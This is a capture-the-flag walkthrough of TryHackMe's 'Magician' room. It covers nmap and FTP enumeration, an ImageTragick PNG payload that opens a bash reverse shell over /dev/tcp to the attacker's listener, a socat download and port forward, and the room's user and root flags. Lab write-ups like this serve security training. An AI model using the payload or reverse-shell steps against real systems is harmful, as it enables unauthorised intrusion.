Magician | TryHackMe Walkthrough
Initial foothold
Let’s first add the hostname to our host's file, as told above:
echo "10.10.100.95 magician" | sudo tee -a /etc/hosts
Nmap discovers 3 open ports:
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
8080/tcp open http-proxy
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404
| Vary: Origin
| Vary: Access-Control-Request-Method
| Vary: Access-Control-Request-Headers
| Content-Type: application/json
| Date: Fri, 30 Apr 2021 09:52:06 GMT
| Connection: close
| {"timestamp":"2021-04-30T09:52:07.398+0000","status":404,"error":"Not Found","message":"No message available","path":"/nice%20ports%2C/Tri%6Eity.txt%2ebak"}
| GetRequest:
| HTTP/1.1 404
| Vary: Origin
| Vary: Access-Control-Request-Method
| Vary: Access-Control-Request-Headers
| Content-Type: application/json
| Date: Fri, 30 Apr 2021 09:52:06 GMT
| Connection: close
| {"timestamp":"2021-04-30T09:52:06.969+0000","status":404,"error":"Not Found","message":"No message available","path":"/"}
| HTTPOptions:
| HTTP/1.1 404
| Vary: Origin
| Vary: Access-Control-Request-Method
| Vary: Access-Control-Request-Headers
| Content-Type: application/json
| Date: Fri, 30 Apr 2021 09:52:06 GMT
| Connection: close
| {"timestamp":"2021-04-30T09:52:07.099+0000","status":404,"error":"Not Found","message":"No message available","path":"/"}
| RTSPRequest:
| HTTP/1.1 505
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 465
| Date: Fri, 30 Apr 2021 09:52:06 GMT
| <!doctype html><html lang="en"><head><title>HTTP Status 505
| HTTP Version Not Supported</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 505
|_ HTTP Version Not Supported</h1></body></html>
|_http-title: Site doesn't have a title (application/json).
8081/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: magician
FTP
Attempting to connect to the FTP service anonymously will succeed and provide us with a hint. However, there is nothing else to expect.
kali@kali:/data/vpn$ ftp magician
Connected to magician.
220 THE MAGIC DOOR
Name (magician:kali): anonymous
331 Please specify the password.
Password:
230-Huh? The door just opens after some time? You're quite the patient one, aren't ya, it's a thing called 'delay_successful_login' in /etc/vsftpd.conf ;) Since you're a rookie, this might help you to get started: https://imagetragick.com. You might need to do some little tweaks though...
230 Login successful.
ftp> ls -la
550 Permission denied.
ftp: bind: Address already in use
ftp> cd /
550 Permission denied.
ftp>
Web (8080)
Browsing http://magician:8080 will show a page that converts a PNG file to a JPG file.
As the hint given by the FTP was referring to a vulnerability (https://imagetragick.com, CVE-2016–3714), we can guess that we have to exploit this vulnerability by uploading a malicious PNG file.
After several failed attempts, I eventually found a working exploit here. Below is the code to make the malicious PNG file:
kali@kali:/data/magician/files$ cat > image.png << EOF
> push graphic-context
> encoding "UTF-8"
> viewbox 0 0 1 1
> affine 1 0 0 1 0 0
> push graphic-context
> image Over 0,0 1,1 '|/bin/bash -i > /dev/tcp/10.8.50.72/4444 0<&1 2>&1'
> pop graphic-context
> pop graphic-context
> EOF
open a listener and upload the image using the web form. A reverse shell spawns in our listener window:
kali@kali:/data/magician/files$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.8.50.72] from (UNKNOWN) [10.10.100.95] 60864
bash: cannot set terminal process group (957): Inappropriate ioctl for device
bash: no job control in this shell
magician@magician:/tmp/hsperfdata_magician$ id
id
uid=1000(magician) gid=1000(magician) groups=1000(magician)
User flag
Let’s get the user flag:
magician@magician:/tmp/hsperfdata_magician$ cd /home
cd /home
magician@magician:/home$ ll
ll
total 12
drwxr-xr-x 3 root root 4096 Jan 30 10:43 ./
drwxr-xr-x 24 root root 4096 Jan 30 10:31 ../
drwxr-xr-x 5 magician magician 4096 Feb 13 07:19 magician/
magician@magician:/home$ cd magician
cd magician
magician@magician:~$ ls -la
ls -la
total 17204
drwxr-xr-x 5 magician magician 4096 Feb 13 07:19 .
drwxr-xr-x 3 root root 4096 Jan 30 10:43 ..
lrwxrwxrwx 1 magician magician 9 Feb 6 13:38 .bash_history -> /dev/null
-rw-r--r-- 1 magician magician 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 magician magician 3771 Apr 4 2018 .bashrc
drwx------ 2 magician magician 4096 Jan 30 10:43 .cache
drwx------ 3 magician magician 4096 Jan 30 10:43 .gnupg
-rw-r--r-- 1 magician magician 807 Apr 4 2018 .profile
-rw-r--r-- 1 magician magician 0 Jan 30 10:43 .sudo_as_admin_successful
-rw------- 1 magician magician 7546 Jan 31 03:50 .viminfo
-rw-r--r-- 1 root root 17565546 Jan 30 11:55 spring-boot-magician-backend-0.0.1-SNAPSHOT.jar
-rw-r--r-- 1 magician magician 170 Feb 13 07:19 the_magic_continues
drwxr-xr-x 2 root root 4096 Feb 5 05:14 uploads
-rw-r--r-- 1 magician magician 24 Jan 30 11:30 user.txt
magician@magician:~$ cat user.txt
cat user.txt
THM{simsalabim_hex_hex}
root.txt
Hint
Still connected as magician
, there is a hint in the /home/magician/
directory:
magician@magician:~$ cat the_magic_continues
cat the_magic_continues
The magician is known to keep a locally listening cat up his sleeve, it is said to be an oracle who will tell you secrets if you are good enough to understand its meows.
Following the hint, I checked the network connections with netstat
, which revealed a weird connection on port 6666
. This is however only available for localhost
.
magician@magician:/tmp/hsperfdata_magician/uploads$ netstat -putan
netstat -putan
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:6666 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:8081 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 300 10.10.100.95:60902 10.8.50.72:4444 ESTABLISHED 27129/bash
tcp6 0 0 :::8080 :::* LISTEN 957/java
tcp6 0 0 :::21 :::* LISTEN -
tcp6 0 0 10.10.100.95:8080 10.8.50.72:35182 ESTABLISHED 957/java
udp 0 0 127.0.0.53:53 0.0.0.0:* -
udp 0 0 10.10.100.95:68 0.0.0.0:* -
The program on port 6666
Let’s use socat
to forward the local port and make the program available to the outside.
Transfer the socat
binary from your Kali box to the server and use it to forward the local port 6666
to port 7777
:
magician@magician:~$ wget http://10.8.50.72:8000/socat
magician@magician:~$ chmod +x socat
magician@magician:~$ ./socat tcp-listen:7777,reuseaddr,fork tcp:localhost:6666
Now, connecting in a browser to port 7777
(http://magician:7777/) shows a new page that allows you to read files. The program is likely run by root
as it allows to read the root flag:
Press Submit until you get a base64 encoded string (the program is rotating through a bunch of encodings, including hex, binary, md5, and base64).
Once we have our root flag as a base64 encoded string, let’s decode it:
kali@kali:/data/src$ echo "VEhNe21hZ2ljX21heV9tYWtlX21hbnlfbWVuX21hZH0K" | base64 -d
THM{magic_may_make_many_men_mad}
Root flag: THM{magic_may_make_many_men_mad}